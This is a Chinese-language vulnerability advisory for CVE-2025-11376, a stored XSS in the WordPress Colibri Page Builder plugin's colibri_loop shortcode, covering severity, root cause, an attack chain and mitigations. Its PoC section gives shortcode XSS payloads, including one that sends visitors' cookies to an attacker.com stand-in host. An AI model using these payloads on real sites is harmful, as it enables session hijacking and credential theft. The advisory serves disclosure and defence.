CVE-2025-11376 CVSS 6.4 中危

CVE-2025-11376 WordPress Colibri Page Builder存储型XSS漏洞

披露日期: 2025-12-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-11376

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Colibri Page Builder插件(WordPress)

漏洞概述

CVE-2025-11376是WordPress Colibri Page Builder插件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于插件的'colibri_loop'短代码功能中，由于对用户提供的属性值缺乏充分的输入清理和输出转义处理，导致恶意脚本可以被注入到页面中。攻击者利用此漏洞需要具有Contributor级别或更高的WordPress用户权限，成功注入的恶意脚本会在任何用户访问被注入页面时自动执行，可能导致会话劫持、凭据窃取或恶意内容传播等安全问题。此漏洞影响插件1.0.335及以下所有版本，CVSS评分6.4，属于中等严重程度。

技术细节

该漏洞的根本原因在于Colibri Page Builder插件的'colibri_loop'短代码处理器对用户输入的属性参数缺少适当的输入验证和输出编码。当攻击者通过短代码属性注入恶意JavaScript代码时，这些未经过滤的内容会被直接存储到数据库中，并在后续页面访问时未经转义直接输出到HTML页面中。由于短代码在WordPress中会被全局解析和执行，存储型XSS payload会在所有访问该页面的用户浏览器中执行。攻击者利用此漏洞可以窃取用户会话Cookie、伪装成管理员执行操作、植入钓鱼内容或重定向用户到恶意站点。修复需要开发者在处理短代码属性时实施严格的输入验证并对所有输出进行适当的HTML实体编码。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站的Contributor或更高权限账户

STEP 2

步骤2

攻击者在页面或文章中插入包含恶意payload的[colibri_loop]短代码

STEP 3

步骤3

短代码处理器未对属性值进行输入清理，直接将恶意脚本存储到数据库

STEP 4

步骤4

当其他用户访问包含该短代码的页面时，未转义的恶意脚本在浏览器中执行

STEP 5

步骤5

攻击者通过XSS成功窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Colibri Page Builder XSS PoC -->
<!-- Requires Contributor-level access or higher -->

[colibri_loop test='" onmouseover="alert(document.cookie)" style="display:block;position:absolute;top:0;left:0;width:100%;height:100%

<!-- Alternative PoC - Stored XSS via shortcode attribute -->
[colibri_loop class='"><script>alert('XSS')</script>']

<!-- More sophisticated payload for session hijacking -->
[colibri_loop data='"><img src=x onerror='fetch("https://attacker.com/steal?c="+document.cookie)'>']

影响范围

Colibri Page Builder插件 <= 1.0.335 (所有版本)

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1)限制用户注册功能，仅允许信任用户注册；2)对Contributor及以上角色用户实施最小权限原则；3)使用WordPress防火墙插件过滤恶意请求；4)临时禁用[colibri_loop]短代码功能；5)加强网站监控，及时发现异常内容注入行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表